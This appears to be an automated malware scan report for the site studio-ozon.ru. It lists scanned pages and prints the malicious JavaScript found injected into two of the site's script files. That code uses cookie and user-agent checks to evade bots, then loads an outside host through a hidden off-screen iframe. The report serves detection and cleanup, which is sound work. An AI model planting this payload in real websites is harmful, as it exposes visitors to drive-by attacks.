Scanned pages/files
| Request | Server response | Status |
http://www.studio-ozon.ru/ | 200 OK Content-Length: 19494 Content-Type: text/html | clean |
http://www.studio-ozon.ru/media/system/js/caption.js | 200 OK Content-Length: 982 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["bots","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCookie("akelbriston19ure")===undefined);if(!d()&&c){document.write('<iframe width="112" height="132" style="position:absolute;margin-top:-1002px;" src="http://freediverindonesia.ga/luckyblock17.html"></iframe>');var a=new Date(new Date().getTime()+48*60*60*1000);document.cookie="akelbriston19ure=1; path=/; expires="+a.toUTCString()}})(); Antivirus reports:
| ||
http://www.studio-ozon.ru/plugins/content/jw_allvideos/includes/js/behaviour.js | 200 OK Content-Length: 2246 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["bots","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCooki var responseContainer = []; window[jsonpCallback] = function(response){ responseContainer.tempId = [response]; }; var head = document.getElementsByTagName('head')[0]; var remotejson = this.getRemoteJson(el.url); head.appendChild(remotejson); remotejson.onload = function(){ document.getElementById(el.playerID).innerHTML = responseContainer.tempId[0].html; } } } ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://www.studio-ozon.ru/plugins/content/jw_allvideos/includes/js/mediaplayer/jwplayer.js | 200 OK Content-Length: 140107 Content-Type: application/javascript | clean |
http://www.studio-ozon.ru/plugins/content/jw_allvideos/includes/js/wmvplayer/silverlight.js | 200 OK Content-Length: 17901 Content-Type: application/javascript | clean |
http://www.studio-ozon.ru/plugins/content/jw_allvideos/includes/js/wmvplayer/wmvplayer.js | 200 OK Content-Length: 24010 Content-Type: application/javascript | clean |
http://www.studio-ozon.ru/plugins/content/jw_allvideos/includes/js/quicktimeplayer/AC_QuickTime.js | 200 OK Content-Length: 8527 Content-Type: application/javascript | clean |
http://counter.rambler.ru/top100.jcn?1617776 | 200 OK Content-Length: 6853 Content-Type: application/x-javascript | clean |
http://www.studio-ozon.ru//mc.yandex.ru/metrika/watch.js/ | 404 Not Found Content-Length: 1844 Content-Type: text/html | clean |
http://www.studio-ozon.ru/index.php | 200 OK Content-Length: 19499 Content-Type: text/html | clean |
http://www.studio-ozon.ru/videop | 200 OK Content-Length: 24064 Content-Type: text/html | clean |
http://www.studio-ozon.ru/foto | 200 OK Content-Length: 13322 Content-Type: text/html | clean |
http://www.studio-ozon.ru/fotostudio | 200 OK Content-Length: 12680 Content-Type: text/html | clean |
http://www.studio-ozon.ru/vipusk | 200 OK Content-Length: 12748 Content-Type: text/html | clean |
http://www.studio-ozon.ru/recklama | 200 OK Content-Length: 13968 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: studio-ozon.ru
Result:
GET / HTTP/1.1
Host: studio-ozon.ru
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: studio-ozon.ru
Referer: http://www.google.com/search?q=studio-ozon.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: studio-ozon.ru
Referer: http://www.google.com/search?q=studio-ozon.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=studio-ozon.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://studio-ozon.ru/
Result: studio-ozon.ru is not infected or malware details are not published yet.
Result: studio-ozon.ru is not infected or malware details are not published yet.